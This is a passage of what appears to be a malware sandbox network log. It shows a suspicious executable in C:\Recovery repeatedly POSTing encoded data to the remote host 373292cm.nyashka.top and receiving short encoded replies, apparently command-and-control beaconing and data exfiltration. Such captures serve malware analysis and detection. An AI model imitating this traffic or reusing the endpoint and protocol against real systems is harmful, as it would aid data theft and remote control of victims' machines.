                                    Aug 25, 2024 15:44:40.431818962 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    82192.168.2.64980980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:40.653474092 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:40.998276949 CEST1820OUTData Raw: 5f 51 5c 56 51 45 51 5b 5b 5f 5a 51 59 56 58 5e 57 5b 5d 5a 57 5d 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _Q\VQEQ[[_ZQYVX^W[]ZW]S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-;00!_ #9>+>.=(="</ !8W?4,&F$.Y/!
                                    Aug 25, 2024 15:44:41.350316048 CEST25INHTTP/1.1 100 Continue


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    83192.168.2.64981080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:40.667280912 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:41.013622046 CEST2516OUTData Raw: 5a 51 5c 52 54 41 54 58 5b 5f 5a 51 59 5f 58 5e 57 5e 5d 58 57 50 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\RTATX[_ZQY_X^W^]XWPS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,#?C"=;##:>=#(>&+=?Y 1#<;"0/&F$.Y/
                                    Aug 25, 2024 15:44:41.352663040 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:41.481997967 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    84192.168.2.64981180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:41.626873016 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:41.996226072 CEST2516OUTData Raw: 5f 53 59 54 54 47 54 59 5b 5f 5a 51 59 53 58 55 57 5a 5d 5f 57 50 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _SYTTGTY[_ZQYSXUWZ]_WPS]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^8U'C"=4^#0)X=$]+>\(/["<#4! Q+(#28&F$.Y/5
                                    Aug 25, 2024 15:44:42.298043966 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:42.505667925 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    85192.168.2.64981380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:42.630007982 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:42.982507944 CEST2516OUTData Raw: 5a 50 5c 51 54 46 54 59 5b 5f 5a 51 59 54 58 56 57 5b 5d 5f 57 5b 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZP\QTFTY[_ZQYTXVW[]_W[S^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\/#<!7 5*>7<)(.#7#S#";?9$7 5X8&F$.Y/)
                                    Aug 25, 2024 15:44:43.301285028 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:43.435637951 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    86192.168.2.64981480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:43.562948942 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:43.919903040 CEST2516OUTData Raw: 5a 51 5c 53 51 42 54 59 5b 5f 5a 51 59 5f 58 50 57 58 5d 5a 57 59 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\SQBTY[_ZQY_XPWX]ZWYS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/U'D!-+7*>("?=$ 441/+9Y#^,&F$.Y/
                                    Aug 25, 2024 15:44:44.248076916 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:44.461978912 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    87192.168.2.64981580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:44.655134916 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:45.013719082 CEST2516OUTData Raw: 5f 50 59 50 51 45 54 5a 5b 5f 5a 51 59 5f 58 56 57 50 5d 5d 57 5c 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _PYPQETZ[_ZQY_XVWP]]W\S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._;33C6>4^#[+.7<>-]<( #S 1V+)# 6..&F$.Y/
                                    Aug 25, 2024 15:44:45.339394093 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:45.466134071 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    88192.168.2.64981680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:45.596263885 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:45.951143026 CEST2516OUTData Raw: 5a 57 5c 51 54 43 54 5c 5b 5f 5a 51 59 55 58 51 57 58 5d 5c 57 59 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZW\QTCT\[_ZQYUXQWX]\WYST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.;#3C6=<Y )\>0^<5Z?[#X#<#V#$W+_+7 98&F$.Y/-
                                    Aug 25, 2024 15:44:46.268445969 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:46.472846031 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    89192.168.2.64981780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:46.551513910 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    90192.168.2.64981880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:46.593861103 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:46.951167107 CEST2516OUTData Raw: 5a 56 5c 56 54 48 54 59 5b 5f 5a 51 59 5f 58 53 57 5b 5d 5c 57 59 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZV\VTHTY[_ZQY_XSW[]\WYS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-8/"-0##9]*[/<"?87,+41,Q?*+X#06.>&F$.Y/
                                    Aug 25, 2024 15:44:47.261003017 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:47.459873915 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    91192.168.2.64981980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:47.688256025 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:48.044972897 CEST2512OUTData Raw: 5a 52 5c 56 51 43 54 59 5b 5f 5a 51 59 57 58 5f 57 50 5d 58 57 5c 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZR\VQCTY[_ZQYWX_WP]XW\SY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,/";43)*.(X<>9_+( <Q7,V+:(43=8&F$.Y/
                                    Aug 25, 2024 15:44:48.381426096 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:48.515692949 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    92192.168.2.64982080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:48.674869061 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:49.029845953 CEST2516OUTData Raw: 5a 51 5c 55 54 48 54 5a 5b 5f 5a 51 59 51 58 55 57 51 5d 5c 57 5e 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\UTHTZ[_ZQYQXUWQ]\W^SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y/#857#0&==#>-5Z++Z#,72/(0" 5]/&F$.Y/=
                                    Aug 25, 2024 15:44:49.076081038 CEST1236OUTData Raw: 38 33 03 2b 36 41 17 21 3e 3a 33 36 3c 55 2d 3f 31 04 16 03 29 2d 26 1e 33 00 0f 58 0d 3d 3f 30 3a 3b 3e 22 07 01 35 0d 3e 01 28 23 02 32 1a 2f 3a 01 03 3a 3c 02 39 31 32 3e 01 3a 06 2b 2f 18 22 30 35 08 34 5f 3e 27 26 07 01 25 10 00 20 1d 07 26
                                    Data Ascii: 83+6A!>:36<U-?1)-&3X=?0:;>"5>(#2/::<912>:+/"054_>'&% &3^]9.#:074,.=?</)[/:=).8!=;"&3E &*Z<&#!2T>(?#4/>&'[5<*3><<$V=04>)&/;=3&?3Z7>_<%74:?Y?73,+<583<8(?:?,'2>
                                    Aug 25, 2024 15:44:49.368427038 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:49.566720963 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    93192.168.2.64982180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:49.703299999 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:50.065424919 CEST2516OUTData Raw: 5f 5c 5c 54 54 48 51 5c 5b 5f 5a 51 59 52 58 5f 57 5d 5d 5f 57 5b 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\\TTHQ\[_ZQYRX_W]]_W[S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-, 8"=84* X(>< Z7R#W$S( \/&F$.Y/1
                                    Aug 25, 2024 15:44:50.389305115 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:50.585814953 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    94192.168.2.64982280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:50.724037886 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:51.076299906 CEST2516OUTData Raw: 5a 52 5c 56 54 47 51 5c 5b 5f 5a 51 59 50 58 51 57 5b 5d 52 57 50 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZR\VTGQ\[_ZQYPXQW[]RWPS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-, /B![(7#9X*>0_+-><>8",P7<+)7436,&F$.Y/
                                    Aug 25, 2024 15:44:51.419457912 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:51.718858957 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    95192.168.2.64982380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:51.720071077 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:52.076334000 CEST1820OUTData Raw: 5f 53 5c 57 51 45 54 59 5b 5f 5a 51 59 5f 58 57 57 59 5d 59 57 50 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\WQETY[_ZQY_XWWY]YWPS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-; ;B".8\ 9)=<<>5(>+#/R7+7\4,&F$.Y/
                                    Aug 25, 2024 15:44:52.400051117 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:52.531572104 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0c 3e 26 22 5d 25 15 30 55 27 23 29 0e 2b 3d 06 01 29 2d 07 14 25 3b 39 5f 31 00 20 1e 27 38 3d 58 28 07 36 1b 31 01 01 5b 3a 1e 2b 5d 0c 13 22 14 20 29 3a 1e 25 12 06 59 3d 16 33 5e 22 5a 29 02 28 5c 32 0b 2b 3f 02 5f 3f 39 0d 1e 28 14 26 56 2c 38 3a 02 39 0e 36 1c 23 04 2b 52 0d 11 24 55 28 3e 3d 52 3e 00 27 59 22 16 33 58 26 3e 3d 09 25 32 03 0b 26 2a 23 04 25 32 29 57 33 31 0b 54 25 15 0c 59 26 2c 39 55 21 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %>&"]%0U'#)+=)-%;9_1 '8=X(61[:+]" ):%Y=3^"Z)(\2+?_?9(&V,8:96#+R$U(>=R>'Y"3X&>=%2&*#%2)W31T%Y&,9U!"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    96192.168.2.64982480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:51.737345934 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:52.091742992 CEST2516OUTData Raw: 5f 57 5c 5e 54 42 51 5e 5b 5f 5a 51 59 50 58 51 57 5a 5d 59 57 5d 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _W\^TBQ^[_ZQYPXQWZ]YW]S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,0!#49*(?-)^<X7/3#!#+?_" _/>&F$.Y/
                                    Aug 25, 2024 15:44:52.435131073 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:52.569750071 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
